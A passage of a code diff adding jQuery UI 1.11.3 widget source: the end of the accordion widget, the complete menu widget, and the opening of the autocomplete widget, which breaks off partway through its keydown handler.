+			.removeClass( "ui-accordion-icons" )
+			.children( ".ui-accordion-header-icon" )
+				.remove();
+	},
+
+	_destroy: function() {
+		var contents;
+
+		// clean up main element
+		this.element
+			.removeClass( "ui-accordion ui-widget ui-helper-reset" )
+			.removeAttr( "role" );
+
+		// clean up headers
+		this.headers
+			.removeClass( "ui-accordion-header ui-accordion-header-active ui-state-default " +
+				"ui-corner-all ui-state-active ui-state-disabled ui-corner-top" )
+			.removeAttr( "role" )
+			.removeAttr( "aria-expanded" )
+			.removeAttr( "aria-selected" )
+			.removeAttr( "aria-controls" )
+			.removeAttr( "tabIndex" )
+			.removeUniqueId();
+
+		this._destroyIcons();
+
+		// clean up content panels
+		contents = this.headers.next()
+			.removeClass( "ui-helper-reset ui-widget-content ui-corner-bottom " +
+				"ui-accordion-content ui-accordion-content-active ui-state-disabled" )
+			.css( "display", "" )
+			.removeAttr( "role" )
+			.removeAttr( "aria-hidden" )
+			.removeAttr( "aria-labelledby" )
+			.removeUniqueId();
+
+		if ( this.options.heightStyle !== "content" ) {
+			contents.css( "height", "" );
+		}
+	},
+
+	_setOption: function( key, value ) {
+		if ( key === "active" ) {
+			// _activate() will handle invalid values and update this.options
+			this._activate( value );
+			return;
+		}
+
+		if ( key === "event" ) {
+			if ( this.options.event ) {
+				this._off( this.headers, this.options.event );
+			}
+			this._setupEvents( value );
+		}
+
+		this._super( key, value );
+
+		// setting collapsible: false while collapsed; open first panel
+		if ( key === "collapsible" && !value && this.options.active === false ) {
+			this._activate( 0 );
+		}
+
+		if ( key === "icons" ) {
+			this._destroyIcons();
+			if ( value ) {
+				this._createIcons();
+			}
+		}
+
+		// #5332 - opacity doesn't cascade to positioned elements in IE
+		// so we need to add the disabled class to the headers and panels
+		if ( key === "disabled" ) {
+			this.element
+				.toggleClass( "ui-state-disabled", !!value )
+				.attr( "aria-disabled", value );
+			this.headers.add( this.headers.next() )
+				.toggleClass( "ui-state-disabled", !!value );
+		}
+	},
+
+	_keydown: function( event ) {
+		if ( event.altKey || event.ctrlKey ) {
+			return;
+		}
+
+		var keyCode = $.ui.keyCode,
+			length = this.headers.length,
+			currentIndex = this.headers.index( event.target ),
+			toFocus = false;
+
+		switch ( event.keyCode ) {
+			case keyCode.RIGHT:
+			case keyCode.DOWN:
+				toFocus = this.headers[ ( currentIndex + 1 ) % length ];
+				break;
+			case keyCode.LEFT:
+			case keyCode.UP:
+				toFocus = this.headers[ ( currentIndex - 1 + length ) % length ];
+				break;
+			case keyCode.SPACE:
+			case keyCode.ENTER:
+				this._eventHandler( event );
+				break;
+			case keyCode.HOME:
+				toFocus = this.headers[ 0 ];
+				break;
+			case keyCode.END:
+				toFocus = this.headers[ length - 1 ];
+				break;
+		}
+
+		if ( toFocus ) {
+			$( event.target ).attr( "tabIndex", -1 );
+			$( toFocus ).attr( "tabIndex", 0 );
+			toFocus.focus();
+			event.preventDefault();
+		}
+	},
+
+	_panelKeyDown: function( event ) {
+		if ( event.keyCode === $.ui.keyCode.UP && event.ctrlKey ) {
+			$( event.currentTarget ).prev().focus();
+		}
+	},
+
+	refresh: function() {
+		var options = this.options;
+		this._processPanels();
+
+		// was collapsed or no panel
+		if ( ( options.active === false && options.collapsible === true ) || !this.headers.length ) {
+			options.active = false;
+			this.active = $();
+		// active false only when collapsible is true
+		} else if ( options.active === false ) {
+			this._activate( 0 );
+		// was active, but active panel is gone
+		} else if ( this.active.length && !$.contains( this.element[ 0 ], this.active[ 0 ] ) ) {
+			// all remaining panel are disabled
+			if ( this.headers.length === this.headers.find(".ui-state-disabled").length ) {
+				options.active = false;
+				this.active = $();
+			// activate previous panel
+			} else {
+				this._activate( Math.max( 0, options.active - 1 ) );
+			}
+		// was active, active panel still exists
+		} else {
+			// make sure active index is correct
+			options.active = this.headers.index( this.active );
+		}
+
+		this._destroyIcons();
+
+		this._refresh();
+	},
+
+	_processPanels: function() {
+		var prevHeaders = this.headers,
+			prevPanels = this.panels;
+
+		this.headers = this.element.find( this.options.header )
+			.addClass( "ui-accordion-header ui-state-default ui-corner-all" );
+
+		this.panels = this.headers.next()
+			.addClass( "ui-accordion-content ui-helper-reset ui-widget-content ui-corner-bottom" )
+			.filter( ":not(.ui-accordion-content-active)" )
+			.hide();
+
+		// Avoid memory leaks (#10056)
+		if ( prevPanels ) {
+			this._off( prevHeaders.not( this.headers ) );
+			this._off( prevPanels.not( this.panels ) );
+		}
+	},
+
+	_refresh: function() {
+		var maxHeight,
+			options = this.options,
+			heightStyle = options.heightStyle,
+			parent = this.element.parent();
+
+		this.active = this._findActive( options.active )
+			.addClass( "ui-accordion-header-active ui-state-active ui-corner-top" )
+			.removeClass( "ui-corner-all" );
+		this.active.next()
+			.addClass( "ui-accordion-content-active" )
+			.show();
+
+		this.headers
+			.attr( "role", "tab" )
+			.each(function() {
+				var header = $( this ),
+					headerId = header.uniqueId().attr( "id" ),
+					panel = header.next(),
+					panelId = panel.uniqueId().attr( "id" );
+				header.attr( "aria-controls", panelId );
+				panel.attr( "aria-labelledby", headerId );
+			})
+			.next()
+				.attr( "role", "tabpanel" );
+
+		this.headers
+			.not( this.active )
+			.attr({
+				"aria-selected": "false",
+				"aria-expanded": "false",
+				tabIndex: -1
+			})
+			.next()
+				.attr({
+					"aria-hidden": "true"
+				})
+				.hide();
+
+		// make sure at least one header is in the tab order
+		if ( !this.active.length ) {
+			this.headers.eq( 0 ).attr( "tabIndex", 0 );
+		} else {
+			this.active.attr({
+				"aria-selected": "true",
+				"aria-expanded": "true",
+				tabIndex: 0
+			})
+			.next()
+				.attr({
+					"aria-hidden": "false"
+				});
+		}
+
+		this._createIcons();
+
+		this._setupEvents( options.event );
+
+		if ( heightStyle === "fill" ) {
+			maxHeight = parent.height();
+			this.element.siblings( ":visible" ).each(function() {
+				var elem = $( this ),
+					position = elem.css( "position" );
+
+				if ( position === "absolute" || position === "fixed" ) {
+					return;
+				}
+				maxHeight -= elem.outerHeight( true );
+			});
+
+			this.headers.each(function() {
+				maxHeight -= $( this ).outerHeight( true );
+			});
+
+			this.headers.next()
+				.each(function() {
+					$( this ).height( Math.max( 0, maxHeight -
+						$( this ).innerHeight() + $( this ).height() ) );
+				})
+				.css( "overflow", "auto" );
+		} else if ( heightStyle === "auto" ) {
+			maxHeight = 0;
+			this.headers.next()
+				.each(function() {
+					maxHeight = Math.max( maxHeight, $( this ).css( "height", "" ).height() );
+				})
+				.height( maxHeight );
+		}
+	},
+
+	_activate: function( index ) {
+		var active = this._findActive( index )[ 0 ];
+
+		// trying to activate the already active panel
+		if ( active === this.active[ 0 ] ) {
+			return;
+		}
+
+		// trying to collapse, simulate a click on the currently active header
+		active = active || this.active[ 0 ];
+
+		this._eventHandler({
+			target: active,
+			currentTarget: active,
+			preventDefault: $.noop
+		});
+	},
+
+	_findActive: function( selector ) {
+		return typeof selector === "number" ? this.headers.eq( selector ) : $();
+	},
+
+	_setupEvents: function( event ) {
+		var events = {
+			keydown: "_keydown"
+		};
+		if ( event ) {
+			$.each( event.split( " " ), function( index, eventName ) {
+				events[ eventName ] = "_eventHandler";
+			});
+		}
+
+		this._off( this.headers.add( this.headers.next() ) );
+		this._on( this.headers, events );
+		this._on( this.headers.next(), { keydown: "_panelKeyDown" });
+		this._hoverable( this.headers );
+		this._focusable( this.headers );
+	},
+
+	_eventHandler: function( event ) {
+		var options = this.options,
+			active = this.active,
+			clicked = $( event.currentTarget ),
+			clickedIsActive = clicked[ 0 ] === active[ 0 ],
+			collapsing = clickedIsActive && options.collapsible,
+			toShow = collapsing ? $() : clicked.next(),
+			toHide = active.next(),
+			eventData = {
+				oldHeader: active,
+				oldPanel: toHide,
+				newHeader: collapsing ? $() : clicked,
+				newPanel: toShow
+			};
+
+		event.preventDefault();
+
+		if (
+				// click on active header, but not collapsible
+				( clickedIsActive && !options.collapsible ) ||
+				// allow canceling activation
+				( this._trigger( "beforeActivate", event, eventData ) === false ) ) {
+			return;
+		}
+
+		options.active = collapsing ? false : this.headers.index( clicked );
+
+		// when the call to ._toggle() comes after the class changes
+		// it causes a very odd bug in IE 8 (see #6720)
+		this.active = clickedIsActive ? $() : clicked;
+		this._toggle( eventData );
+
+		// switch classes
+		// corner classes on the previously active header stay after the animation
+		active.removeClass( "ui-accordion-header-active ui-state-active" );
+		if ( options.icons ) {
+			active.children( ".ui-accordion-header-icon" )
+				.removeClass( options.icons.activeHeader )
+				.addClass( options.icons.header );
+		}
+
+		if ( !clickedIsActive ) {
+			clicked
+				.removeClass( "ui-corner-all" )
+				.addClass( "ui-accordion-header-active ui-state-active ui-corner-top" );
+			if ( options.icons ) {
+				clicked.children( ".ui-accordion-header-icon" )
+					.removeClass( options.icons.header )
+					.addClass( options.icons.activeHeader );
+			}
+
+			clicked
+				.next()
+				.addClass( "ui-accordion-content-active" );
+		}
+	},
+
+	_toggle: function( data ) {
+		var toShow = data.newPanel,
+			toHide = this.prevShow.length ? this.prevShow : data.oldPanel;
+
+		// handle activating a panel during the animation for another activation
+		this.prevShow.add( this.prevHide ).stop( true, true );
+		this.prevShow = toShow;
+		this.prevHide = toHide;
+
+		if ( this.options.animate ) {
+			this._animate( toShow, toHide, data );
+		} else {
+			toHide.hide();
+			toShow.show();
+			this._toggleComplete( data );
+		}
+
+		toHide.attr({
+			"aria-hidden": "true"
+		});
+		toHide.prev().attr({
+			"aria-selected": "false",
+			"aria-expanded": "false"
+		});
+		// if we're switching panels, remove the old header from the tab order
+		// if we're opening from collapsed state, remove the previous header from the tab order
+		// if we're collapsing, then keep the collapsing header in the tab order
+		if ( toShow.length && toHide.length ) {
+			toHide.prev().attr({
+				"tabIndex": -1,
+				"aria-expanded": "false"
+			});
+		} else if ( toShow.length ) {
+			this.headers.filter(function() {
+				return parseInt( $( this ).attr( "tabIndex" ), 10 ) === 0;
+			})
+			.attr( "tabIndex", -1 );
+		}
+
+		toShow
+			.attr( "aria-hidden", "false" )
+			.prev()
+				.attr({
+					"aria-selected": "true",
+					"aria-expanded": "true",
+					tabIndex: 0
+				});
+	},
+
+	_animate: function( toShow, toHide, data ) {
+		var total, easing, duration,
+			that = this,
+			adjust = 0,
+			down = toShow.length &&
+				( !toHide.length || ( toShow.index() < toHide.index() ) ),
+			animate = this.options.animate || {},
+			options = down && animate.down || animate,
+			complete = function() {
+				that._toggleComplete( data );
+			};
+
+		if ( typeof options === "number" ) {
+			duration = options;
+		}
+		if ( typeof options === "string" ) {
+			easing = options;
+		}
+		// fall back from options to animation in case of partial down settings
+		easing = easing || options.easing || animate.easing;
+		duration = duration || options.duration || animate.duration;
+
+		if ( !toHide.length ) {
+			return toShow.animate( this.showProps, duration, easing, complete );
+		}
+		if ( !toShow.length ) {
+			return toHide.animate( this.hideProps, duration, easing, complete );
+		}
+
+		total = toShow.show().outerHeight();
+		toHide.animate( this.hideProps, {
+			duration: duration,
+			easing: easing,
+			step: function( now, fx ) {
+				fx.now = Math.round( now );
+			}
+		});
+		toShow
+			.hide()
+			.animate( this.showProps, {
+				duration: duration,
+				easing: easing,
+				complete: complete,
+				step: function( now, fx ) {
+					fx.now = Math.round( now );
+					if ( fx.prop !== "height" ) {
+						adjust += fx.now;
+					} else if ( that.options.heightStyle !== "content" ) {
+						fx.now = Math.round( total - toHide.outerHeight() - adjust );
+						adjust = 0;
+					}
+				}
+			});
+	},
+
+	_toggleComplete: function( data ) {
+		var toHide = data.oldPanel;
+
+		toHide
+			.removeClass( "ui-accordion-content-active" )
+			.prev()
+				.removeClass( "ui-corner-top" )
+				.addClass( "ui-corner-all" );
+
+		// Work around for rendering bug in IE (#5421)
+		if ( toHide.length ) {
+			toHide.parent()[ 0 ].className = toHide.parent()[ 0 ].className;
+		}
+		this._trigger( "activate", null, data );
+	}
+});
+
+
+/*!
+ * jQuery UI Menu 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/menu/
+ */
+
+
+var menu = $.widget( "ui.menu", {
+	version: "1.11.3",
+	defaultElement: "<ul>",
+	delay: 300,
+	options: {
+		icons: {
+			submenu: "ui-icon-carat-1-e"
+		},
+		items: "> *",
+		menus: "ul",
+		position: {
+			my: "left-1 top",
+			at: "right top"
+		},
+		role: "menu",
+
+		// callbacks
+		blur: null,
+		focus: null,
+		select: null
+	},
+
+	_create: function() {
+		this.activeMenu = this.element;
+
+		// Flag used to prevent firing of the click handler
+		// as the event bubbles up through nested menus
+		this.mouseHandled = false;
+		this.element
+			.uniqueId()
+			.addClass( "ui-menu ui-widget ui-widget-content" )
+			.toggleClass( "ui-menu-icons", !!this.element.find( ".ui-icon" ).length )
+			.attr({
+				role: this.options.role,
+				tabIndex: 0
+			});
+
+		if ( this.options.disabled ) {
+			this.element
+				.addClass( "ui-state-disabled" )
+				.attr( "aria-disabled", "true" );
+		}
+
+		this._on({
+			// Prevent focus from sticking to links inside menu after clicking
+			// them (focus should always stay on UL during navigation).
+			"mousedown .ui-menu-item": function( event ) {
+				event.preventDefault();
+			},
+			"click .ui-menu-item": function( event ) {
+				var target = $( event.target );
+				if ( !this.mouseHandled && target.not( ".ui-state-disabled" ).length ) {
+					this.select( event );
+
+					// Only set the mouseHandled flag if the event will bubble, see #9469.
+					if ( !event.isPropagationStopped() ) {
+						this.mouseHandled = true;
+					}
+
+					// Open submenu on click
+					if ( target.has( ".ui-menu" ).length ) {
+						this.expand( event );
+					} else if ( !this.element.is( ":focus" ) && $( this.document[ 0 ].activeElement ).closest( ".ui-menu" ).length ) {
+
+						// Redirect focus to the menu
+						this.element.trigger( "focus", [ true ] );
+
+						// If the active item is on the top level, let it stay active.
+						// Otherwise, blur the active item since it is no longer visible.
+						if ( this.active && this.active.parents( ".ui-menu" ).length === 1 ) {
+							clearTimeout( this.timer );
+						}
+					}
+				}
+			},
+			"mouseenter .ui-menu-item": function( event ) {
+				// Ignore mouse events while typeahead is active, see #10458.
+				// Prevents focusing the wrong item when typeahead causes a scroll while the mouse
+				// is over an item in the menu
+				if ( this.previousFilter ) {
+					return;
+				}
+				var target = $( event.currentTarget );
+				// Remove ui-state-active class from siblings of the newly focused menu item
+				// to avoid a jump caused by adjacent elements both having a class with a border
+				target.siblings( ".ui-state-active" ).removeClass( "ui-state-active" );
+				this.focus( event, target );
+			},
+			mouseleave: "collapseAll",
+			"mouseleave .ui-menu": "collapseAll",
+			focus: function( event, keepActiveItem ) {
+				// If there's already an active item, keep it active
+				// If not, activate the first item
+				var item = this.active || this.element.find( this.options.items ).eq( 0 );
+
+				if ( !keepActiveItem ) {
+					this.focus( event, item );
+				}
+			},
+			blur: function( event ) {
+				this._delay(function() {
+					if ( !$.contains( this.element[0], this.document[0].activeElement ) ) {
+						this.collapseAll( event );
+					}
+				});
+			},
+			keydown: "_keydown"
+		});
+
+		this.refresh();
+
+		// Clicks outside of a menu collapse any open menus
+		this._on( this.document, {
+			click: function( event ) {
+				if ( this._closeOnDocumentClick( event ) ) {
+					this.collapseAll( event );
+				}
+
+				// Reset the mouseHandled flag
+				this.mouseHandled = false;
+			}
+		});
+	},
+
+	_destroy: function() {
+		// Destroy (sub)menus
+		this.element
+			.removeAttr( "aria-activedescendant" )
+			.find( ".ui-menu" ).addBack()
+				.removeClass( "ui-menu ui-widget ui-widget-content ui-menu-icons ui-front" )
+				.removeAttr( "role" )
+				.removeAttr( "tabIndex" )
+				.removeAttr( "aria-labelledby" )
+				.removeAttr( "aria-expanded" )
+				.removeAttr( "aria-hidden" )
+				.removeAttr( "aria-disabled" )
+				.removeUniqueId()
+				.show();
+
+		// Destroy menu items
+		this.element.find( ".ui-menu-item" )
+			.removeClass( "ui-menu-item" )
+			.removeAttr( "role" )
+			.removeAttr( "aria-disabled" )
+			.removeUniqueId()
+			.removeClass( "ui-state-hover" )
+			.removeAttr( "tabIndex" )
+			.removeAttr( "role" )
+			.removeAttr( "aria-haspopup" )
+			.children().each( function() {
+				var elem = $( this );
+				if ( elem.data( "ui-menu-submenu-carat" ) ) {
+					elem.remove();
+				}
+			});
+
+		// Destroy menu dividers
+		this.element.find( ".ui-menu-divider" ).removeClass( "ui-menu-divider ui-widget-content" );
+	},
+
+	_keydown: function( event ) {
+		var match, prev, character, skip,
+			preventDefault = true;
+
+		switch ( event.keyCode ) {
+		case $.ui.keyCode.PAGE_UP:
+			this.previousPage( event );
+			break;
+		case $.ui.keyCode.PAGE_DOWN:
+			this.nextPage( event );
+			break;
+		case $.ui.keyCode.HOME:
+			this._move( "first", "first", event );
+			break;
+		case $.ui.keyCode.END:
+			this._move( "last", "last", event );
+			break;
+		case $.ui.keyCode.UP:
+			this.previous( event );
+			break;
+		case $.ui.keyCode.DOWN:
+			this.next( event );
+			break;
+		case $.ui.keyCode.LEFT:
+			this.collapse( event );
+			break;
+		case $.ui.keyCode.RIGHT:
+			if ( this.active && !this.active.is( ".ui-state-disabled" ) ) {
+				this.expand( event );
+			}
+			break;
+		case $.ui.keyCode.ENTER:
+		case $.ui.keyCode.SPACE:
+			this._activate( event );
+			break;
+		case $.ui.keyCode.ESCAPE:
+			this.collapse( event );
+			break;
+		default:
+			preventDefault = false;
+			prev = this.previousFilter || "";
+			character = String.fromCharCode( event.keyCode );
+			skip = false;
+
+			clearTimeout( this.filterTimer );
+
+			if ( character === prev ) {
+				skip = true;
+			} else {
+				character = prev + character;
+			}
+
+			match = this._filterMenuItems( character );
+			match = skip && match.index( this.active.next() ) !== -1 ?
+				this.active.nextAll( ".ui-menu-item" ) :
+				match;
+
+			// If no matches on the current filter, reset to the last character pressed
+			// to move down the menu to the first item that starts with that character
+			if ( !match.length ) {
+				character = String.fromCharCode( event.keyCode );
+				match = this._filterMenuItems( character );
+			}
+
+			if ( match.length ) {
+				this.focus( event, match );
+				this.previousFilter = character;
+				this.filterTimer = this._delay(function() {
+					delete this.previousFilter;
+				}, 1000 );
+			} else {
+				delete this.previousFilter;
+			}
+		}
+
+		if ( preventDefault ) {
+			event.preventDefault();
+		}
+	},
+
+	_activate: function( event ) {
+		if ( !this.active.is( ".ui-state-disabled" ) ) {
+			if ( this.active.is( "[aria-haspopup='true']" ) ) {
+				this.expand( event );
+			} else {
+				this.select( event );
+			}
+		}
+	},
+
+	refresh: function() {
+		var menus, items,
+			that = this,
+			icon = this.options.icons.submenu,
+			submenus = this.element.find( this.options.menus );
+
+		this.element.toggleClass( "ui-menu-icons", !!this.element.find( ".ui-icon" ).length );
+
+		// Initialize nested menus
+		submenus.filter( ":not(.ui-menu)" )
+			.addClass( "ui-menu ui-widget ui-widget-content ui-front" )
+			.hide()
+			.attr({
+				role: this.options.role,
+				"aria-hidden": "true",
+				"aria-expanded": "false"
+			})
+			.each(function() {
+				var menu = $( this ),
+					item = menu.parent(),
+					submenuCarat = $( "<span>" )
+						.addClass( "ui-menu-icon ui-icon " + icon )
+						.data( "ui-menu-submenu-carat", true );
+
+				item
+					.attr( "aria-haspopup", "true" )
+					.prepend( submenuCarat );
+				menu.attr( "aria-labelledby", item.attr( "id" ) );
+			});
+
+		menus = submenus.add( this.element );
+		items = menus.find( this.options.items );
+
+		// Initialize menu-items containing spaces and/or dashes only as dividers
+		items.not( ".ui-menu-item" ).each(function() {
+			var item = $( this );
+			if ( that._isDivider( item ) ) {
+				item.addClass( "ui-widget-content ui-menu-divider" );
+			}
+		});
+
+		// Don't refresh list items that are already adapted
+		items.not( ".ui-menu-item, .ui-menu-divider" )
+			.addClass( "ui-menu-item" )
+			.uniqueId()
+			.attr({
+				tabIndex: -1,
+				role: this._itemRole()
+			});
+
+		// Add aria-disabled attribute to any disabled menu item
+		items.filter( ".ui-state-disabled" ).attr( "aria-disabled", "true" );
+
+		// If the active item has been removed, blur the menu
+		if ( this.active && !$.contains( this.element[ 0 ], this.active[ 0 ] ) ) {
+			this.blur();
+		}
+	},
+
+	_itemRole: function() {
+		return {
+			menu: "menuitem",
+			listbox: "option"
+		}[ this.options.role ];
+	},
+
+	_setOption: function( key, value ) {
+		if ( key === "icons" ) {
+			this.element.find( ".ui-menu-icon" )
+				.removeClass( this.options.icons.submenu )
+				.addClass( value.submenu );
+		}
+		if ( key === "disabled" ) {
+			this.element
+				.toggleClass( "ui-state-disabled", !!value )
+				.attr( "aria-disabled", value );
+		}
+		this._super( key, value );
+	},
+
+	focus: function( event, item ) {
+		var nested, focused;
+		this.blur( event, event && event.type === "focus" );
+
+		this._scrollIntoView( item );
+
+		this.active = item.first();
+		focused = this.active.addClass( "ui-state-focus" ).removeClass( "ui-state-active" );
+		// Only update aria-activedescendant if there's a role
+		// otherwise we assume focus is managed elsewhere
+		if ( this.options.role ) {
+			this.element.attr( "aria-activedescendant", focused.attr( "id" ) );
+		}
+
+		// Highlight active parent menu item, if any
+		this.active
+			.parent()
+			.closest( ".ui-menu-item" )
+			.addClass( "ui-state-active" );
+
+		if ( event && event.type === "keydown" ) {
+			this._close();
+		} else {
+			this.timer = this._delay(function() {
+				this._close();
+			}, this.delay );
+		}
+
+		nested = item.children( ".ui-menu" );
+		if ( nested.length && event && ( /^mouse/.test( event.type ) ) ) {
+			this._startOpening(nested);
+		}
+		this.activeMenu = item.parent();
+
+		this._trigger( "focus", event, { item: item } );
+	},
+
+	_scrollIntoView: function( item ) {
+		var borderTop, paddingTop, offset, scroll, elementHeight, itemHeight;
+		if ( this._hasScroll() ) {
+			borderTop = parseFloat( $.css( this.activeMenu[0], "borderTopWidth" ) ) || 0;
+			paddingTop = parseFloat( $.css( this.activeMenu[0], "paddingTop" ) ) || 0;
+			offset = item.offset().top - this.activeMenu.offset().top - borderTop - paddingTop;
+			scroll = this.activeMenu.scrollTop();
+			elementHeight = this.activeMenu.height();
+			itemHeight = item.outerHeight();
+
+			if ( offset < 0 ) {
+				this.activeMenu.scrollTop( scroll + offset );
+			} else if ( offset + itemHeight > elementHeight ) {
+				this.activeMenu.scrollTop( scroll + offset - elementHeight + itemHeight );
+			}
+		}
+	},
+
+	blur: function( event, fromFocus ) {
+		if ( !fromFocus ) {
+			clearTimeout( this.timer );
+		}
+
+		if ( !this.active ) {
+			return;
+		}
+
+		this.active.removeClass( "ui-state-focus" );
+		this.active = null;
+
+		this._trigger( "blur", event, { item: this.active } );
+	},
+
+	_startOpening: function( submenu ) {
+		clearTimeout( this.timer );
+
+		// Don't open if already open fixes a Firefox bug that caused a .5 pixel
+		// shift in the submenu position when mousing over the carat icon
+		if ( submenu.attr( "aria-hidden" ) !== "true" ) {
+			return;
+		}
+
+		this.timer = this._delay(function() {
+			this._close();
+			this._open( submenu );
+		}, this.delay );
+	},
+
+	_open: function( submenu ) {
+		var position = $.extend({
+			of: this.active
+		}, this.options.position );
+
+		clearTimeout( this.timer );
+		this.element.find( ".ui-menu" ).not( submenu.parents( ".ui-menu" ) )
+			.hide()
+			.attr( "aria-hidden", "true" );
+
+		submenu
+			.show()
+			.removeAttr( "aria-hidden" )
+			.attr( "aria-expanded", "true" )
+			.position( position );
+	},
+
+	collapseAll: function( event, all ) {
+		clearTimeout( this.timer );
+		this.timer = this._delay(function() {
+			// If we were passed an event, look for the submenu that contains the event
+			var currentMenu = all ? this.element :
+				$( event && event.target ).closest( this.element.find( ".ui-menu" ) );
+
+			// If we found no valid submenu ancestor, use the main menu to close all sub menus anyway
+			if ( !currentMenu.length ) {
+				currentMenu = this.element;
+			}
+
+			this._close( currentMenu );
+
+			this.blur( event );
+			this.activeMenu = currentMenu;
+		}, this.delay );
+	},
+
+	// With no arguments, closes the currently active menu - if nothing is active
+	// it closes all menus.  If passed an argument, it will search for menus BELOW
+	_close: function( startMenu ) {
+		if ( !startMenu ) {
+			startMenu = this.active ? this.active.parent() : this.element;
+		}
+
+		startMenu
+			.find( ".ui-menu" )
+				.hide()
+				.attr( "aria-hidden", "true" )
+				.attr( "aria-expanded", "false" )
+			.end()
+			.find( ".ui-state-active" ).not( ".ui-state-focus" )
+				.removeClass( "ui-state-active" );
+	},
+
+	_closeOnDocumentClick: function( event ) {
+		return !$( event.target ).closest( ".ui-menu" ).length;
+	},
+
+	_isDivider: function( item ) {
+
+		// Match hyphen, em dash, en dash
+		return !/[^\-\u2014\u2013\s]/.test( item.text() );
+	},
+
+	collapse: function( event ) {
+		var newItem = this.active &&
+			this.active.parent().closest( ".ui-menu-item", this.element );
+		if ( newItem && newItem.length ) {
+			this._close();
+			this.focus( event, newItem );
+		}
+	},
+
+	expand: function( event ) {
+		var newItem = this.active &&
+			this.active
+				.children( ".ui-menu " )
+				.find( this.options.items )
+				.first();
+
+		if ( newItem && newItem.length ) {
+			this._open( newItem.parent() );
+
+			// Delay so Firefox will not hide activedescendant change in expanding submenu from AT
+			this._delay(function() {
+				this.focus( event, newItem );
+			});
+		}
+	},
+
+	next: function( event ) {
+		this._move( "next", "first", event );
+	},
+
+	previous: function( event ) {
+		this._move( "prev", "last", event );
+	},
+
+	isFirstItem: function() {
+		return this.active && !this.active.prevAll( ".ui-menu-item" ).length;
+	},
+
+	isLastItem: function() {
+		return this.active && !this.active.nextAll( ".ui-menu-item" ).length;
+	},
+
+	_move: function( direction, filter, event ) {
+		var next;
+		if ( this.active ) {
+			if ( direction === "first" || direction === "last" ) {
+				next = this.active
+					[ direction === "first" ? "prevAll" : "nextAll" ]( ".ui-menu-item" )
+					.eq( -1 );
+			} else {
+				next = this.active
+					[ direction + "All" ]( ".ui-menu-item" )
+					.eq( 0 );
+			}
+		}
+		if ( !next || !next.length || !this.active ) {
+			next = this.activeMenu.find( this.options.items )[ filter ]();
+		}
+
+		this.focus( event, next );
+	},
+
+	nextPage: function( event ) {
+		var item, base, height;
+
+		if ( !this.active ) {
+			this.next( event );
+			return;
+		}
+		if ( this.isLastItem() ) {
+			return;
+		}
+		if ( this._hasScroll() ) {
+			base = this.active.offset().top;
+			height = this.element.height();
+			this.active.nextAll( ".ui-menu-item" ).each(function() {
+				item = $( this );
+				return item.offset().top - base - height < 0;
+			});
+
+			this.focus( event, item );
+		} else {
+			this.focus( event, this.activeMenu.find( this.options.items )
+				[ !this.active ? "first" : "last" ]() );
+		}
+	},
+
+	previousPage: function( event ) {
+		var item, base, height;
+		if ( !this.active ) {
+			this.next( event );
+			return;
+		}
+		if ( this.isFirstItem() ) {
+			return;
+		}
+		if ( this._hasScroll() ) {
+			base = this.active.offset().top;
+			height = this.element.height();
+			this.active.prevAll( ".ui-menu-item" ).each(function() {
+				item = $( this );
+				return item.offset().top - base + height > 0;
+			});
+
+			this.focus( event, item );
+		} else {
+			this.focus( event, this.activeMenu.find( this.options.items ).first() );
+		}
+	},
+
+	_hasScroll: function() {
+		return this.element.outerHeight() < this.element.prop( "scrollHeight" );
+	},
+
+	select: function( event ) {
+		// TODO: It should never be possible to not have an active item at this
+		// point, but the tests don't trigger mouseenter before click.
+		this.active = this.active || $( event.target ).closest( ".ui-menu-item" );
+		var ui = { item: this.active };
+		if ( !this.active.has( ".ui-menu" ).length ) {
+			this.collapseAll( event, true );
+		}
+		this._trigger( "select", event, ui );
+	},
+
+	_filterMenuItems: function(character) {
+		var escapedCharacter = character.replace( /[\-\[\]{}()*+?.,\\\^$|#\s]/g, "\\$&" ),
+			regex = new RegExp( "^" + escapedCharacter, "i" );
+
+		return this.activeMenu
+			.find( this.options.items )
+
+			// Only match on items, not dividers or other content (#10571)
+			.filter( ".ui-menu-item" )
+			.filter(function() {
+				return regex.test( $.trim( $( this ).text() ) );
+			});
+	}
+});
+
+
+/*!
+ * jQuery UI Autocomplete 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/autocomplete/
+ */
+
+
+$.widget( "ui.autocomplete", {
+	version: "1.11.3",
+	defaultElement: "<input>",
+	options: {
+		appendTo: null,
+		autoFocus: false,
+		delay: 300,
+		minLength: 1,
+		position: {
+			my: "left top",
+			at: "left bottom",
+			collision: "none"
+		},
+		source: null,
+
+		// callbacks
+		change: null,
+		close: null,
+		focus: null,
+		open: null,
+		response: null,
+		search: null,
+		select: null
+	},
+
+	requestIndex: 0,
+	pending: 0,
+
+	_create: function() {
+		// Some browsers only repeat keydown events, not keypress events,
+		// so we use the suppressKeyPress flag to determine if we've already
+		// handled the keydown event. #7269
+		// Unfortunately the code for & in keypress is the same as the up arrow,
+		// so we use the suppressKeyPressRepeat flag to avoid handling keypress
+		// events when we know the keydown event was used to modify the
+		// search term. #7799
+		var suppressKeyPress, suppressKeyPressRepeat, suppressInput,
+			nodeName = this.element[ 0 ].nodeName.toLowerCase(),
+			isTextarea = nodeName === "textarea",
+			isInput = nodeName === "input";
+
+		this.isMultiLine =
+			// Textareas are always multi-line
+			isTextarea ? true :
+			// Inputs are always single-line, even if inside a contentEditable element
+			// IE also treats inputs as contentEditable
+			isInput ? false :
+			// All other element types are determined by whether or not they're contentEditable
+			this.element.prop( "isContentEditable" );
+
+		this.valueMethod = this.element[ isTextarea || isInput ? "val" : "text" ];
+		this.isNewMenu = true;
+
+		this.element
+			.addClass( "ui-autocomplete-input" )
+			.attr( "autocomplete", "off" );
+
+		this._on( this.element, {
+			keydown: function( event ) {
+				if ( this.element.prop( "readOnly" ) ) {
+					suppressKeyPress = true;
+					suppressInput = true;
+					suppressKeyPressRepeat = true;
+					return;
+				}
+
+				suppressKeyPress = false;
+				suppressInput = false;
+				suppressKeyPressRepeat = false;
+				var keyCode = $.ui.keyCode;
+				switch ( event.keyCode ) {
+				case keyCode.PAGE_UP:
+					suppressKeyPress = true;
+					this._move( "previousPage", event );
+					break;
+				case keyCode.PAGE_DOWN:
+					suppressKeyPress = true;
+					this._move( "nextPage", event );
+					break;
+				case keyCode.UP:
+					suppressKeyPress = true;
+					this._keyEvent( "previous", event );
+					break;
